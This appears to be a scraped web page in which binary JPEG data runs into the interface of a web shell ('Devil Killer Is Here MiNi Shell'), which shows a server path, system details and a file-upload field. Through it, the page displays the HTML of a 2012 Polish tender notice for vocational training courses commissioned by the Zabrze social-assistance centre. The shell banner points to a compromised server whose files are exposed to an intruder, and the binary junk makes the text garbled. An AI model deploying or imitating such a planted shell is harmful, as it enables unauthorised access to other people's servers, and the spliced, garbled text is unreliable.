JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120411/113538-N-2012.html

<p class="kh_header"><b>Zabrze: Szkolenia dla uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.</b><br>
<b>Numer ogłoszenia: 113538 - 2012; data zamieszczenia: 11.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Roosevelta 40, 41-800 Zabrze, woj. śląskie, tel. 032 2777800, faks 032 2777802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.zabrze.pl.pl,www.zabrze.magistrat.pl/zakładka opieka społeczna/mopr/zamówienia publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia dla uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie realizowane będzie w formie szkoleń w zakresach tematycznych, z których każde stanowi odrębną część.
CZĘŚĆ 1 - Profesjonalny sprzedawca wraz z obsługą kasy fiskalnej i komputerowej
Program powinien zawierać m.in. zagadnienia dotyczące : profesjonalnej obsługi  klienta, zasad i obsługi procesu sprzedaży, zagadnienia nowoczesnej techniki sprzedaży, zasady prowadzenia rozliczeń finansowych, kody kreskowe, obsługa kas fiskalnych, podstawy obsługi komputera w tym obsługa programu sprzedażowego, fakturowanie, organizowanie i planowanie działalności punktu sprzedaży, organizacja własnego stanowiska pracy zgodnie z przepisami i zasadami bezpieczeństwa i higieny pracy, ochrony przeciwpożarowej, zapewnienie i przestrzeganie warunków sanitarnych sprzedaży, pozyskiwanie klientów w ramach sprzedaży drobnodetalicznej, detalicznej, hurtowej, przygotowanie produktów do sprzedaży oraz ich ekspozycja, przyjmowanie i rozpatrywanie reklamacji zakupionych towarów, dbanie o wizerunek punktu sprzedaży oraz jakość obsługi  klienta.
A)	UCZESTNICY
W szkoleniu weźmie udział od  12 do 45 uczestników/uczestniczek projektu systemowego.
W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby skierowanych osób na kurs.
B)	FORMA i CZAS TRWANIA
1. Realizacja odbywać się będzie 5 dni w tygodniu od poniedziałku do piątku
2. Dzienny wymiar godzin dydaktycznych nie powinien przekroczyć  5 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut) z uwzględnieniem przerwy kawowej 15 minut oraz przerwy na obiad 30 minut.
3. Ilość godzin na każdego uczestnika  - 150
C) MIEJSCE REALIZACJI
Miejsce realizacji szkolenia -pomieszczenie na terenie miasta Zabrze
Grupy - maksymalnie 15 osobowe

CZĘŚĆ 2 - Obsługa kasy fiskalnej
Program powinien zawierać m.in. zagadnienia związane z doborem odpowiedniego urządzenia w zależności od specyfiki, organizacji i wielkości danego produktu sprzedaży, zasady zastosowania kas fiskalnych w placówkach handlowych, podstawy prawne, praktyczna obsługa kas oraz wykorzystanie urządzeń rejestrujących do celów rozliczeniowych.
A)	UCZESTNICY
W szkoleniu weźmie udział od  5 do 15 uczestników/uczestniczek projektu systemowego.
W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby skierowanych osób na kurs.
B)	FORMA i CZAS TRWANIA
1. Realizacja odbywać się będzie 5 dni w tygodniu od poniedziałku do piątku
2. Dzienny wymiar godzin dydaktycznych nie powinien przekroczyć  5 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut) z uwzględnieniem przerwy kawowej 15 minut oraz przerwy na obiad 30 minut.
3. Ilość godzin na każdego uczestnika  - 13
C) MIEJSCE REALIZACJI
Miejsce realizacji szkolenia -pomieszczenie na terenie miasta Zabrze
CZĘŚĆ 3 - Prowadzenie magazynu i hurtowni z komputerem
Program szkolenia winien zawierać zagadnienia dotyczące: podstaw Obsługi komputera, gospodarkę magazynową, organizację pracy magazyniera-hurtownika, przepisy prawne związane z funkcjonowaniem gospodarki magazynowej, obsługa programu komputerowego do prowadzenia magazynu i hurtowni, minimum sanitarne, obsługa kas fiskalnych, profesjonalna obsługa Klienta.
A)	UCZESTNICY
W szkoleniu weźmie udział od  5 do 12 uczestników/uczestniczek projektu systemowego.
W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby skierowanych osób na kurs.
B)	FORMA i CZAS TRWANIA
1. Realizacja odbywać się będzie 5 dni w tygodniu od poniedziałku do piątku
2. Dzienny wymiar godzin dydaktycznych nie powinien przekroczyć  5 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut) z uwzględnieniem przerwy kawowej 15 minut oraz przerwy na obiad 30 minut.
3. Ilość godzin na każdego uczestnika  - 200(minimum 100 godzin praktycznych)
C) MIEJSCE REALIZACJI
Miejsce realizacji szkolenia -pomieszczenie na terenie miasta Zabrze
CZĘŚĆ 4 - Pracownik administracyjno - biurowy z modułem kadry i płace
Program powinien zawierać m.in. zagadnienia dotyczące : organizację pracy biurowej, obsługę urządzeń biurowych, zasady obsługi interesanta. Savoir vivre pracownika biurowego, wybrane-podstawowe zagadnienia ekonomiczne i prawne, podstawy rachunkowości, obsługa i użytkowanie biurowych programów komputerowych, obsługa Internetu i poczty elektronicznej, tworzenie dokumentów związanych z pracą biurową, dokumentacja księgowa zakładu pracy, wybrane elementy zagadnień kadrowych, Prawo pracy , system, rozkład i okres rozliczeniowy czasu pracy, niewykonywanie pracy a prawo do wynagrodzenia, zasady udzielania innych urlopów pracowniczych i zwolnień od pracy .
A)	UCZESTNICY
W szkoleniu weźmie udział od  3 do 10 uczestników/uczestniczek projektu systemowego.
W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby skierowanych osób na kurs.
B)	FORMA i CZAS TRWANIA
1. Realizacja odbywać się będzie 5 dni w tygodniu od poniedziałku do piątku
2. Dzienny wymiar godzin dydaktycznych nie powinien przekroczyć  5 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut) z uwzględnieniem przerwy kawowej 15 minut oraz przerwy na obiad 30 minut.
3. Ilość godzin na każdego uczestnika  - 200( w tym minimum 100 godzin praktycznych)
C) MIEJSCE REALIZACJI
Miejsce realizacji szkolenia -pomieszczenie na terenie miasta Zabrze
CZĘŚĆ 5 - Opiekun/ka osób starszych-niepełnosprawnych i dzieci
Program powinien zawierać m.in. zagadnienia dotyczące usług pielęgniarsko - opiekuńczych tj. m.in. higieny i pielęgnacji podopiecznych, pierwsza pomoc, komunikacja i współpraca z podopiecznym i jego rodziną, organizowanie opieki zdrowotnej i czasu wolnego podopiecznemu w opiece domowej, zasady etyki zawodowej, wiedza teoretyczna na temat wieku podeszłego, niemowlęcego i dziecięcego, pielęgnowanie dziecka zdrowego, obserwowanie i kontrolowanie prawidłowego rozwoju psychicznego i fizycznego dziecka. Dolegliwości w okresie choroby i ich przyczyny, przygotowywanie posiłków, podstawy prawne. Opieka nad osobą niepełnosprawną.
A)	UCZESTNICY
W szkoleniu weźmie udział od  5 do 18 uczestników/uczestniczek projektu systemowego.
W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby skierowanych osób na kurs.
B)	FORMA i CZAS TRWANIA
1. Realizacja odbywać się będzie 5 dni w tygodniu od poniedziałku do piątku
2. Dzienny wymiar godzin dydaktycznych nie powinien przekroczyć  5 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut) z uwzględnieniem przerwy kawowej 15 minut oraz przerwy na obiad 30 minut.
3. Ilość godzin na każdego uczestnika  - 100
C) MIEJSCE REALIZACJI
Miejsce realizacji szkolenia -pomieszczenie na terenie miasta Zabrze.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o braku podstaw oraz wpis do rejestru instytucji szkoleniowych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o braku podstaw oraz oświadczenie , że wykonali lub wykonują należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie minimum 2 zamówienia/usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczeni</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie oraz zaświadczenie z US</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">referencje lub inny dokument potwierdzający , że usługa została wykonana należycie</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>parafowany wzór umowy
pełnomocnictwo
formularz oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiana osób funkcyjnych - z przyczyn niezależnych od Zamawiającego i Wykonawcy;
- zmiana sposobu reprezentacji - z przyczyn niezależnych od Zamawiającego i Wykonawcy;
- zmiana adresu siedziby jednej ze stron - z przyczyn zewnętrznych;
- wprowadzenie lub zmiana podwykonawcy - w uzasadnionych przypadkach, za pisemną zgodą Zamawiającego
- zmiana limitów osób - uczestników ,
- zmiana miejsca realizacji zajęć;
-zmiana terminu realizacji zamówienia;
- wprowadzenie informacji dodatkowych związanych z nowymi wytycznymi w realizacji Projektu;
- zmiana wymiaru realizacji ilości godzin;
- zmiana osób -kadry zapewnionej przez Wykonawcę;
- w przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę różnicy w kwocie podatku VAT, ;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.zabrze.pl,www.zabrze.magistrat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKI OŚRODEK POMOCY RODZINIE UL.ROOSEVELTA 40 41-800 ZABRZE POKÓJ 216-2 PIĘTRO..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2012 godzina 09:00, miejsce: MIEJSKI OŚRODEK POMOCY RODZINIE UL.ROOSEVELTA 40 41-800 ZABRZE POKÓJ 117 KANCELARIA-1 PIĘTRO..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Profesjonalny sprzedawca wraz z obsługą kasy fiskalnej i komputerowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program powinien zawierać m.in. zagadnienia dotyczące : profesjonalnej obsługi  klienta, zasad i obsługi procesu sprzedaży, zagadnienia nowoczesnej techniki sprzedaży, zasady prowadzenia rozliczeń finansowych, kody kreskowe, obsługa kas fiskalnych, podstawy obsługi komputera w tym obsługa programu sprzedażowego, fakturowanie, organizowanie i planowanie działalności punktu sprzedaży, organizacja własnego stanowiska pracy zgodnie z przepisami i zasadami bezpieczeństwa i higieny pracy, ochrony przeciwpożarowej, zapewnienie i przestrzeganie warunków sanitarnych sprzedaży, pozyskiwanie klientów w ramach sprzedaży drobnodetalicznej, detalicznej, hurtowej, przygotowanie produktów do sprzedaży oraz ich ekspozycja, przyjmowanie i rozpatrywanie reklamacji zakupionych towarów, dbanie o wizerunek punktu sprzedaży oraz jakość obsługi  klienta.
A)	UCZESTNICY
W szkoleniu weźmie udział od  12 do 45 uczestników/uczestniczek projektu systemowego.
W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby skierowanych osób na kurs.
B)	FORMA i CZAS TRWANIA
1. Realizacja odbywać się będzie 5 dni w tygodniu od poniedziałku do piątku
2. Dzienny wymiar godzin dydaktycznych nie powinien przekroczyć  5 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut) z uwzględnieniem przerwy kawowej 15 minut oraz przerwy na obiad 30 minut.
3. Ilość godzin na każdego uczestnika  - 150
C) MIEJSCE REALIZACJI
Miejsce realizacji szkolenia -pomieszczenie na terenie miasta Zabrze
Grupy - maksymalnie 15 osobowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> obsługa kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program powinien zawierać m.in. zagadnienia związane z doborem odpowiedniego urządzenia w zależności od specyfiki, organizacji i wielkości danego produktu sprzedaży, zasady zastosowania kas fiskalnych w placówkach handlowych, podstawy prawne, praktyczna obsługa kas oraz wykorzystanie urządzeń rejestrujących do celów rozliczeniowych.
A)	UCZESTNICY
W szkoleniu weźmie udział od  5 do 15 uczestników/uczestniczek projektu systemowego.
W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby skierowanych osób na kurs.
B)	FORMA i CZAS TRWANIA
1. Realizacja odbywać się będzie 5 dni w tygodniu od poniedziałku do piątku
2. Dzienny wymiar godzin dydaktycznych nie powinien przekroczyć  5 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut) z uwzględnieniem przerwy kawowej 15 minut oraz przerwy na obiad 30 minut.
3. Ilość godzin na każdego uczestnika  - 13
C) MIEJSCE REALIZACJI
Miejsce realizacji szkolenia -pomieszczenie na terenie miasta Zabrze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prowadzenie magazynu i hurtowni z komputerem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia winien zawierać zagadnienia dotyczące: podstaw Obsługi komputera, gospodarkę magazynową, organizację pracy magazyniera-hurtownika, przepisy prawne związane z funkcjonowaniem gospodarki magazynowej, obsługa programu komputerowego do prowadzenia magazynu i hurtowni, minimum sanitarne, obsługa kas fiskalnych, profesjonalna obsługa Klienta.
A)	UCZESTNICY
W szkoleniu weźmie udział od  5 do 12 uczestników/uczestniczek projektu systemowego.
W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby skierowanych osób na kurs.
B)	FORMA i CZAS TRWANIA
1. Realizacja odbywać się będzie 5 dni w tygodniu od poniedziałku do piątku
2. Dzienny wymiar godzin dydaktycznych nie powinien przekroczyć  5 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut) z uwzględnieniem przerwy kawowej 15 minut oraz przerwy na obiad 30 minut.
3. Ilość godzin na każdego uczestnika  - 200(minimum 100 godzin praktycznych).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
